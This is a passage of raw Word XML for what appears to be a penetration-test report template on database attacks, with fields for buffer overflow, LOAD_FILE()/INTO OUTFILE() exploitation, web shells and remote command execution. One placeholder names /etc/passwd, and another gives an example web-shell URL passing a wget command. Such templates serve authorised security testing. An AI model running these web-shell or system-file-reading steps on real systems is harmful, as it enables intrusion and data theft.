          <w:p w14:paraId="25A4BEDF" w14:textId="77777777" w:rsidR="00447E24" w:rsidRPr="00447E24" w:rsidRDefault="00447E24" w:rsidP="00447E2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447E2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[*Example: FROM_TZ function with excessively long input string]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F960D3" w14:textId="77777777" w:rsidR="00447E24" w:rsidRDefault="00447E24" w:rsidP="00447E2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97F21E4" w14:textId="09F3FD1C" w:rsidR="00447E24" w:rsidRPr="008B3FB9" w:rsidRDefault="00447E24" w:rsidP="00447E2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B3FB9" w:rsidRPr="008B3FB9" w14:paraId="064817BC" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29510F28" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Performed Buffer Overflow Attack Successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3179" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25BF3126" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="159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8B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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32CD3A73" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="159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8B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w14:paraId="5EBADE76" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16C3457D" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Gained Remote Access to the Operating System using Buffer Overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3179" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C4D9D1B" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="159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8B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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289106B4" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="159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8B3FB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C63E9D" w:rsidRPr="008B3FB9" w14:paraId="36F17CB2" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B3CC8AD" w14:textId="59C1B75A" w:rsidR="00C63E9D" w:rsidRPr="008B3FB9" w:rsidRDefault="00E67863" w:rsidP="009B15B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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62E3C3DA" w14:textId="77777777" w:rsidR="00C63E9D" w:rsidRDefault="00C63E9D" w:rsidP="00C63E9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9FA5F14" w14:textId="77777777" w:rsidR="00E67863" w:rsidRDefault="00E67863" w:rsidP="00C63E9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823F818" w14:textId="30947027" w:rsidR="00E67863" w:rsidRPr="008B3FB9" w:rsidRDefault="00E67863" w:rsidP="00C63E9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67863" w:rsidRPr="008B3FB9" w14:paraId="65D0158E" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67F1A2FD" w14:textId="385F49F0" w:rsidR="00E67863" w:rsidRPr="00C63E9D" w:rsidRDefault="00E67863" w:rsidP="009B15B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63E9D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Observed Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AA45FFE" w14:textId="77777777" w:rsidR="00E67863" w:rsidRPr="00C63E9D" w:rsidRDefault="00E67863" w:rsidP="00E678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C63E9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[*Database Disconnection, DoS, Privilege Escalation, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F036B04" w14:textId="77777777" w:rsidR="00E67863" w:rsidRDefault="00E67863" w:rsidP="00E678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C06A40B" w14:textId="77777777" w:rsidR="00E67863" w:rsidRPr="00C63E9D" w:rsidRDefault="00E67863" w:rsidP="00E678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E67863" w:rsidRPr="008B3FB9" w14:paraId="31E997DA" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="281F8074" w14:textId="538C9DBE" w:rsidR="00E67863" w:rsidRPr="00C63E9D" w:rsidRDefault="00E67863" w:rsidP="009B15B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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A00893F" w14:textId="77777777" w:rsidR="00E67863" w:rsidRDefault="00E67863" w:rsidP="00E678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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A2129A0" w14:textId="77777777" w:rsidR="00E67863" w:rsidRDefault="00E67863" w:rsidP="00E678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B8FACEB" w14:textId="1CDDE619" w:rsidR="00E67863" w:rsidRPr="00C63E9D" w:rsidRDefault="00E67863" w:rsidP="00E678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1471A2" w:rsidRPr="008B3FB9" w14:paraId="28745161" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F611674" w14:textId="283A7EE7" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="009B15B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1471A2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F96794C" w14:textId="77777777" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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1471A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Unvalidated Input Handling, Weak Database Protections, Unrestricted String Processing,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A9073A1" w14:textId="77777777" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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AA71F9A" w14:textId="21930692" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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1471A2" w:rsidRPr="008B3FB9" w14:paraId="7B0BEA4D" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FDD5115" w14:textId="51AB7118" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="009B15B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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="650FE017" w14:textId="77777777" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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EE21789" w14:textId="77777777" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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87C7E74" w14:textId="77777777" w:rsidR="001471A2" w:rsidRDefault="001471A2" w:rsidP="00E678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8B3FB9" w:rsidRPr="008B3FB9" w14:paraId="11628411" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F5421D" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="009B15B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B3FB9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682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F625ED" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="160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619FBAC" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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DD8B1A6" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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D242809" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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F20CF7D" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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8C4CFBE" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRPr="008B3FB9" w:rsidRDefault="008B3FB9" w:rsidP="008B3FB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5D5C8B91" w14:textId="77777777" w:rsidR="00357595" w:rsidRDefault="00357595" w:rsidP="00357595">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426328DF" w14:textId="77777777" w:rsidR="00357595" w:rsidRPr="00B07F1E" w:rsidRDefault="00357595" w:rsidP="00357595">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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57595" w:rsidRPr="005D2C80" w14:paraId="25207D95" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7123BBC4" w14:textId="77777777" w:rsidR="00357595" w:rsidRPr="005D2C80" w:rsidRDefault="00357595" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02E7365C" w14:textId="77777777" w:rsidR="00357595" w:rsidRPr="005D2C80" w:rsidRDefault="00357595" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B1D071D" w14:textId="77777777" w:rsidR="00357595" w:rsidRDefault="00357595" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F831B62" w14:textId="77777777" w:rsidR="00357595" w:rsidRDefault="00357595" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33BE4316" w14:textId="77777777" w:rsidR="00357595" w:rsidRPr="005D2C80" w:rsidRDefault="00357595" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BEF772A" w14:textId="77777777" w:rsidR="008B3FB9" w:rsidRDefault="008B3FB9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DB0B95" w:rsidRPr="00A51A96" w14:paraId="466BACB1" w14:textId="77777777" w:rsidTr="009B15B8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="65B0B063" w14:textId="360C9364" w:rsidR="00DB0B95" w:rsidRPr="003C713F" w:rsidRDefault="00DB0B95" w:rsidP="00972D9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7.18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DB0B95">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Access System Files and Execute Remote Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BFE4012" w14:textId="77777777" w:rsidR="00357595" w:rsidRPr="009B15B8" w:rsidRDefault="00357595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5"/>
        <w:gridCol w:w="2530"/>
        <w:gridCol w:w="6610"/>
        <w:gridCol w:w="95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w14:paraId="632E21FF" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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30BC9406" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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bookmarkStart w:id="9" w:name="_Hlk189220085"/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4D87860B" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="00DB0B9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="202BD0D2" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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7BDB10D8" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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1E222D2D" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="00DB0B9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="453F19F1" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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4BF6C7FA" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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5562AACB" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="00DB0B9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="5F005335" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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20D3177B" w14:textId="23BE6CE4" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00632E60" w:rsidP="009B15B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32E60">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerability Tested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227F6484" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00632E60" w:rsidRDefault="00632E60" w:rsidP="00DB0B9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32E6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[*LOAD_FILE(), INTO OUTFILE(), etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3896DC" w14:textId="67DD94FF" w:rsidR="00632E60" w:rsidRPr="00DB0B95" w:rsidRDefault="00632E60" w:rsidP="00DB0B9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="2905C0C3" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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2A84F790" w14:textId="5DDD6811" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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Functions </w:t>
            </w:r>
            <w:r w:rsidR="009B15B8"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Used</w:t>
            </w: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to Access System Files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4A1A2AF3" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="161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8EE8BBC" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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27394DF" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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6E4F7DD" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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B0B95" w:rsidRPr="00DB0B95" w14:paraId="0F30797F" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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5CC0CCC2" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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System Commands Executed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6B7C1919" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="163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2DBC022" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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3668922" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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D6C4F72" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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07F98" w:rsidRPr="00DB0B95" w14:paraId="767ACB7E" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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19824E79" w14:textId="7FC44F29" w:rsidR="00A07F98" w:rsidRPr="00DB0B95" w:rsidRDefault="00A07F98" w:rsidP="009B15B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07F98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LOAD_FILE() Exploitation Attempted?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14261D7F" w14:textId="77777777" w:rsidR="00A07F98" w:rsidRPr="00A07F98" w:rsidRDefault="00A07F98" w:rsidP="00A07F9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A07F9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[*Yes/No, File Accessed: /etc/passwd, Other Sensitive Files]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37092FC8" w14:textId="61D325DC" w:rsidR="00A07F98" w:rsidRPr="00DB0B95" w:rsidRDefault="00A07F98" w:rsidP="00A07F9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B44C5" w:rsidRPr="00DB0B95" w14:paraId="38DB02FC" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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69551978" w14:textId="59DF6DCD" w:rsidR="001B44C5" w:rsidRPr="00A07F98" w:rsidRDefault="001B44C5" w:rsidP="009B15B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B44C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>INTO OUTFILE() Exploitation Attempted?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00BEF574" w14:textId="2D2B4FD4" w:rsidR="001B44C5" w:rsidRPr="00A07F98" w:rsidRDefault="001B44C5" w:rsidP="00A07F9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1B44C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Web Shell or Malicious File Created?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1B44C5" w:rsidRPr="00DB0B95" w14:paraId="70EAAD1B" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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22FD93A7" w14:textId="2EECE809" w:rsidR="001B44C5" w:rsidRPr="001B44C5" w:rsidRDefault="001B44C5" w:rsidP="009B15B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B44C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Web Shell Execution Successful?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54C4D84C" w14:textId="02C86BEE" w:rsidR="001B44C5" w:rsidRDefault="001B44C5" w:rsidP="00A07F9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1B44C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 URL: http://www.example.com/shell.php?command=wget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D275178" w14:textId="77777777" w:rsidR="001B44C5" w:rsidRDefault="001B44C5" w:rsidP="00A07F9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5163B37" w14:textId="7C0483B3" w:rsidR="001B44C5" w:rsidRDefault="001B44C5" w:rsidP="00A07F9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7930E4" w:rsidRPr="00DB0B95" w14:paraId="0C06EDE8" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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635B02C9" w14:textId="57FEC077" w:rsidR="007930E4" w:rsidRPr="001B44C5" w:rsidRDefault="007930E4" w:rsidP="009B15B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930E4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Remote Command Execution Verified?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4033356B" w14:textId="77777777" w:rsidR="007930E4" w:rsidRDefault="007930E4" w:rsidP="00A07F9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7930E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Commands Executed if applicable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DA7C462" w14:textId="77777777" w:rsidR="007930E4" w:rsidRDefault="007930E4" w:rsidP="00A07F9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586B628" w14:textId="10912C29" w:rsidR="007930E4" w:rsidRDefault="007930E4" w:rsidP="00A07F9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433C5C" w:rsidRPr="00DB0B95" w14:paraId="53A7424B" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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04502431" w14:textId="17FAEE9D" w:rsidR="00433C5C" w:rsidRPr="007930E4" w:rsidRDefault="00433C5C" w:rsidP="009B15B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Approach Followed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7FEDFFC4" w14:textId="77777777" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="00A07F9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1891996" w14:textId="77777777" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="00A07F9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433C5C" w:rsidRPr="00DB0B95" w14:paraId="6E2DF935" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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275FD59D" w14:textId="3B34538A" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="009B15B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Evidence Collected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78005812" w14:textId="1C361737" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="00A07F9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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C5CC87" w14:textId="77777777" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="00A07F9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292A0C2" w14:textId="77777777" w:rsidR="00433C5C" w:rsidRDefault="00433C5C" w:rsidP="00A07F9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="664BC090" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr>
          <w:trHeight w:val="1250"/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51B1AFA3" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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Information Retrieved from System Files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28ABEA64" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="00DB0B9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37121" w:rsidRPr="00DB0B95" w14:paraId="37E2478A" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr>
          <w:trHeight w:val="1250"/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35E38ACE" w14:textId="68CBF1E7" w:rsidR="00437121" w:rsidRPr="00DB0B95" w:rsidRDefault="00437121" w:rsidP="009B15B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Remediation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7550CD56" w14:textId="77777777" w:rsidR="00437121" w:rsidRPr="00DB0B95" w:rsidRDefault="00437121" w:rsidP="00DB0B9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B0B95" w:rsidRPr="00DB0B95" w14:paraId="16A88370" w14:textId="77777777" w:rsidTr="000D6E77">
        <w:trPr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03274409" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="009B15B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1469BA14" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="162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7145C92" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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3302C93" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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A2ACD96" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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71DA03A" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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6989568" w14:textId="77777777" w:rsidR="00DB0B95" w:rsidRPr="00DB0B95" w:rsidRDefault="00DB0B95" w:rsidP="00DB0B9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37121" w:rsidRPr="00DB0B95" w14:paraId="7216F1DA" w14:textId="77777777" w:rsidTr="000D6E77">
